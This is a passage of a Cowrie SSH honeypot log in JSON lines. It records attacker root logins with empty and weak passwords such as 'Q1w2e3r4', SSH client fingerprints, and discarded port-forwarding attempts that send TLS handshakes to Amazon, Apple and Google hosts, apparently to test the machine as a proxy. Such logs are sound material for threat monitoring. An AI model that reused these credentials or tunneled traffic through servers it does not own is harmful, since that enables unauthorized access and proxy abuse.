i\\x9d\\xd4\\x933\\xb1\\x99\\xed\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x1a\\x00\\x18\\x00\\x00\\x15checkip.amazonaws.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 2\\xd7\\xa8\\x8d\\xd9\\xe1\\xcd]'\\xe7\\xe7\\xe5\\xfa\\x06\\xe1z1P\\x86\\xd8\\xab\\xd8!\\xc7O\\xe8\\xb2\\xa2\\x92nO)\\x00\\x15\\x00\\xa1\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-26T07:56:49.048454Z","src_ip":"194.0.234.21","session":"9667984acfdc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"23.2.65.48","dst_port":443,"src_ip":"194.0.234.21","src_port":51158,"message":"direct-tcp connection request to 23.2.65.48:443 from 127.0.0.1:51158","sensor":"my-vps","timestamp":"2025-08-26T07:56:49.096823Z","session":"9667984acfdc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"23.2.65.48","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03wk\\xe45J\\xdad\\xe56\\xe6\\xb7\\xfc^\\xfcG\\x85\\xb7N&S\\x1a\\x9fm\\xa7\\xf0\\xb7\\xbd&o\\x03\\xc3O \\xa4d\\xe2\\x0c!\\xef\\x03]\\x14\\xa3\\xc7\\xca\\xa0\\xd1\\x85\\xe6\\xca\\x1e>\\xed\\x9f\\x02\\xb6rs=\\xf1\\x8b\\xa2\\xa5 \\xe6\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x12\\x00\\x10\\x00\\x00\\rwww.apple.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\x99\\x8a+\\xceVce-\\x01\\xb0\\xfa\\x1a\\xdb\\xce\\x96\\xeb\\xdb\\x9aD\\x8e+\\xd4\\xa0\\x9d\\xb0\\xc3\\xc5\\x9a\\x87\\xfa\\xe7V\\x00\\x15\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":1,"message":"discarded direct-tcp forward request 1 to 23.2.65.48:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03wk\\xe45J\\xdad\\xe56\\xe6\\xb7\\xfc^\\xfcG\\x85\\xb7N&S\\x1a\\x9fm\\xa7\\xf0\\xb7\\xbd&o\\x03\\xc3O \\xa4d\\xe2\\x0c!\\xef\\x03]\\x14\\xa3\\xc7\\xca\\xa0\\xd1\\x85\\xe6\\xca\\x1e>\\xed\\x9f\\x02\\xb6rs=\\xf1\\x8b\\xa2\\xa5 \\xe6\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x12\\x00\\x10\\x00\\x00\\rwww.apple.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\x99\\x8a+\\xceVce-\\x01\\xb0\\xfa\\x1a\\xdb\\xce\\x96\\xeb\\xdb\\x9aD\\x8e+\\xd4\\xa0\\x9d\\xb0\\xc3\\xc5\\x9a\\x87\\xfa\\xe7V\\x00\\x15\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-26T07:56:49.235629Z","src_ip":"194.0.234.21","session":"9667984acfdc"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-26T07:56:49.469891Z","src_ip":"212.227.235.229","session":"94f659055d32"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T07:56:49.515221Z","src_ip":"212.227.235.229","session":"94f659055d32"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"142.250.186.196","dst_port":443,"src_ip":"194.0.234.21","src_port":52064,"message":"direct-tcp connection request to 142.250.186.196:443 from 127.0.0.1:52064","sensor":"my-vps","timestamp":"2025-08-26T07:56:49.984603Z","session":"9667984acfdc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"142.250.186.196","dst_port":443,"data":"b'\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xd3\\x1f\\xbf\\x03\\xfae\\x80\\xaf\\x90\"7\\x82\\xd0u\\x07K0&\\x92ac\\x9a\\xf6\\x8a\\xcf\\xf5\\xdc;\\xbf\\x954\\x91 \\x06\\\\pl\\x99S\\x12\\x0bw\\x90t\\x00\\x02\\xaftf\\x9aq;\\x12\\xbd\\xc2\\xe6w\\xfc\\xe7\\x0b\\x98\\xe8\\xcf\\x9e\\t\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0\\'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x13\\x00\\x11\\x00\\x00\\x0ewww.google.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 #\\xf3\\xbaO\\x1b\\xd8t\\xcc+H\\xf4\\xdb\\x19\\x94\\x19\\x86v\\xd7\\xc6d\\xe2\\xfd\\xcae\\xd2\\xc3\\x07R~\\xe6`M\\x00\\x15\\x00\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'","id":2,"message":"discarded direct-tcp forward request 2 to 142.250.186.196:443 with data b'\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xd3\\x1f\\xbf\\x03\\xfae\\x80\\xaf\\x90\"7\\x82\\xd0u\\x07K0&\\x92ac\\x9a\\xf6\\x8a\\xcf\\xf5\\xdc;\\xbf\\x954\\x91 \\x06\\\\pl\\x99S\\x12\\x0bw\\x90t\\x00\\x02\\xaftf\\x9aq;\\x12\\xbd\\xc2\\xe6w\\xfc\\xe7\\x0b\\x98\\xe8\\xcf\\x9e\\t\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0\\'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x13\\x00\\x11\\x00\\x00\\x0ewww.google.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 #\\xf3\\xbaO\\x1b\\xd8t\\xcc+H\\xf4\\xdb\\x19\\x94\\x19\\x86v\\xd7\\xc6d\\xe2\\xfd\\xcae\\xd2\\xc3\\x07R~\\xe6`M\\x00\\x15\\x00\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'","sensor":"my-vps","timestamp":"2025-08-26T07:56:50.297587Z","src_ip":"194.0.234.21","session":"9667984acfdc"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:56:50.328553Z","src_ip":"194.0.234.21","session":"9667984acfdc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":432,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"1.7","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:56:51.245354Z","src_ip":"212.227.235.229","session":"94f659055d32"}
{"eventid":"cowrie.session.closed","duration":3.7743642330169678,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:56:51.250539Z","src_ip":"212.227.235.229","session":"94f659055d32"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55276,"dst_ip":"1.2.3.4","dst_port":22,"session":"88e10409b527","protocol":"ssh","message":"New connection: 212.227.235.229:55276 (1.2.3.4:22) [session: 88e10409b527]","sensor":"my-vps","timestamp":"2025-08-26T07:57:07.331995Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","message":"Remote SSH version: SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","sensor":"my-vps","timestamp":"2025-08-26T07:57:07.332994Z","src_ip":"212.227.235.229","session":"88e10409b527"}
{"eventid":"cowrie.client.kex","hassh":"390ffe68a68c2a2891210413e80689fa","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com,zlib","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","sk-ecdsa-sha2-nistp256-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","sk-ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","sk-ecdsa-sha2-nistp256@openssh.com","ssh-ed25519","sk-ssh-ed25519@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: 390ffe68a68c2a2891210413e80689fa","sensor":"my-vps","timestamp":"2025-08-26T07:57:07.436368Z","src_ip":"212.227.235.229","session":"88e10409b527"}
{"eventid":"cowrie.login.success","username":"root","password":"Q1w2e3r4","message":"login attempt [root/Q1w2e3r4] succeeded","sensor":"my-vps","timestamp":"2025-08-26T07:57:07.954798Z","src_ip":"212.227.235.229","session":"88e10409b527"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"54.228.208.160","dst_port":443,"src_ip":"212.227.235.229","src_port":39202,"message":"direct-tcp connection request to 54.228.208.160:443 from 127.0.0.1:39202","sensor":"my-vps","timestamp":"2025-08-26T07:57:08.729090Z","session":"88e10409b527"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"54.228.208.160","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03Y,l\\x98a\\x97\\xaa\\xec\\x0f)S\\xd3\\xbe\\xb9\\xe9\\xd7\\x84M\\xf7\\x02\\x9a\\xbfX\\xa4\\xa6p\\x96\\x8f\\x8c\\x96\\xb8\\xf9 lv\\x8d\\xfe?\\t\\x94\\xab\\x9d\\xbbP\\xaf\\xb9\\xec\\xa1M\\xdd\\x8c\\x0e\\x1ax%\\xf1T\\x80\\xdc\\xad\\x8fw\\xed\\xdb\\xbc\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x1a\\x00\\x18\\x00\\x00\\x15checkip.amazonaws.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\x1d\\xf7\\x98CnR\\xf2\\xd72\\xfc\\xa3\\xe7\\x0b\\x82_5\\x0b\\x10\\x94\\x85MY(\\xe1\\xf8\\xce-CAx%_\\x00\\x15\\x00\\xa1\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":0,"message":"discarded direct-tcp forward request 0 to 54.228.208.160:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03Y,l\\x98a\\x97\\xaa\\xec\\x0f)S\\xd3\\xbe\\xb9\\xe9\\xd7\\x84M\\xf7\\x02\\x9a\\xbfX\\xa4\\xa6p\\x96\\x8f\\x8c\\x96\\xb8\\xf9 